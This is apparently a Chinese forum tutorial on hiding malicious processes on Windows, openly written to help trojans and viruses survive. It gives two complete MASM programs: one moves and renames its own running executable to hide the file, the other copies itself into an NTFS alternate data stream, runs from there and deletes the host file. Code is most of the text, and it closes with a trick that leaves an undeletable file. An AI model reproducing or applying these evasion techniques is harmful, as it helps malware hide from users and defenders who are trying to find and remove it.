找啊找啊找，怎么你也找不到！呵呵^0^进程隐藏？干吗用？你不知道？我晕！进程隐藏技术多用于木马和病毒中（还用你说？！），用于提高其生存率。其实现方法因WIN系统架构不同而各异，据我个人掌握的资料，主要有下面一些方法（因个人能力和精力有限，无法介绍全面，如各位大哥还有高招，望指点小弟一二！）

    伪隐藏

    这里的“伪隐藏”指的是，虽然在“WINDOWS任务管理器”进程列表中可以看到其进程存在，但在硬盘中却找不到或者说不容易找到其相对应的程序文件。（把它归为“进程隐藏”，有点欠妥，勉强算吧。）

    一：乾坤大挪移

    大家都知道，当一个程序正在运行时，WIN系统是不允许我们把其删除的（所以才会有人寻找程序自删除技术），但却不知大家是否注意到，在WIN2000中，当一个程序正在运行时，我们虽然不能把它删除，但我们却可以把程序文件在同一分区内移动位置以及重命名，你可以自己试验一下！试想，如果我们的程序在运行后，立即把自身移动位置并重命名，而在“WINDOWS任务管理器”进程列表中显示的却还是原来的程序名，那你又该如何来查找到其对应的程序文件呢？当然如果程序在内存中没有进行变形的话，你可以利用内存查看软件（如WINHEX）并利用查找功能来找到相对应的程序文件，但如果程序在内存中变形，也可以说解密，使得内存映像和硬盘中的原程序文件不同，那我是暂时没法找出来啦！

    实现代码如下(MASM)：

    ;进程隐藏之乾坤大挪移（只能在同分区内移动）
    .386
    .model flat, stdcall
    option casemap:none

    include windows.inc
    include kernel32.inc
    includelib kernel32.lib
    include user32.inc
    includelib user32.lib
    .data?
    selfname db MAX_PATH dup(?)
    .data
    movename db "c:\mm.jpg",0
    .code
    main:
    invoke GetModuleFileName,NULL,addr selfname,MAX_PATH ;得到自身路径
    mov al, byte ptr selfname ;得到所在分区
    mov byte ptr movename,al ;修正movename，使其在同分区内移动
    invoke MoveFile,addr selfname,addr movename ;把自身移动位置并改名
    invoke MessageBox,NULL,offset selfname,offset movename,MB_OK
    invoke ExitProcess, NULL
    end main

    本例程在WIN2000下调试通过，XP和WIN2003应该也可以，请有条件的弟兄测试，WIN98和WINME不能用，与硬盘格式无关！

    二：程序自删除（仅适用于NTFS硬盘分区格式)

    在NTFS分区下存在文件流早已不是什么秘密啦，但大家主要用它来隐藏文件，我在一次测试中却发现当我运行一个文件流程序时，这个文件流程序所在的宿主文件却是可以被删除的！进一步测试发现文件流程序运行时并无法直接删除这个文件流程序，只能删除宿主文件，从而来删除文件流程序。利用此特性，我们同样可以实现类似于上例的效果，且比其隐藏效果要好点。方法为：判断是否是NTFS格式分区，如果是则把自身复制为一个文件流，并运行复制的文件流，运行时检测到自己是存在于文件流中时就删除宿主文件。

    实现代码如下(MASM)：

    ;进程隐藏之文件流（只能用于NTFS分区格式）
    .386
    .model flat, stdcall
    option casemap:none

    include windows.inc
    include kernel32.inc
    includelib kernel32.lib
    include user32.inc
    includelib user32.lib
    .data?
    selfname db MAX_PATH dup(?)
    szFileSystemName db 10 dup(?)
    .data

    delname db "`.`:icyfox.exe",0
    ;此处的“`.`:icyfox.exe”可以改为其他文件名如"cs.txt:cs.exe"
    ;我这里用“`.`”的目的是为了防止删除其他存在的文件

    szErr db "我不在NTFS格式的分区内，退出!",0
    szYes db "我在下面的流内，已被删除！",0
    .code

    main:
    invoke GetModuleFileName,NULL,addr selfname,MAX_PATH
    mov bl,byte ptr selfname+3
    mov byte ptr selfname+3,0
    xor eax,eax

    ;下面获取自身所在分区格式，并判断是否是NTFS格式
    invoke GetVolumeInformation,addr selfname,eax,eax,\
    eax,eax,eax,addr szFileSystemName, sizeof szFileSystemName
    mov byte ptr selfname+3,bl
    .if dword ptr szFileSystemName!='SFTN';NTFS
    invoke MessageBox,NULL,offset szErr,NULL,MB_OK
    invoke ExitProcess, NULL
    .endif

    ;下面判断自己是否在流（STREAM）中
    ;如果路径中含有两个:号，说明自己在文件流中
    lea esi,selfname
    xor edx,edx
    @@:
    LODSB
    or al,al
    jz @F ;遇到0结束
    .if al==":"
    INC edx
    .endif
    .if edx==2
    mov byte ptr [esi-1],0
    invoke DeleteFile,addr selfname ;删除宿主文件
    invoke MessageBox,NULL,offset delname,offset szYes,MB_OK
    invoke ExitProcess, NULL
    .endif
    jmp @B

    ;下面是当自身不在文件流中时，把自身复制到流中并运行
    @@:
    invoke CopyFile,addr selfname,addr delname,FALSE
    invoke WinExec,addr delname,NULL
    invoke ExitProcess, NULL
    end main

    附加品：

    我在测试时发现,当delname(也就是流名)为" .:icyfox.exe" (.前为一空格，也可以是其他字符)时，会产生一个无法删除的文件" ."，我的盘中还留着它，请大家想想办法帮我删掉它！我怀疑可能和那个文件夹漏洞有关，但现在是文件，我在后面加上\也删不掉!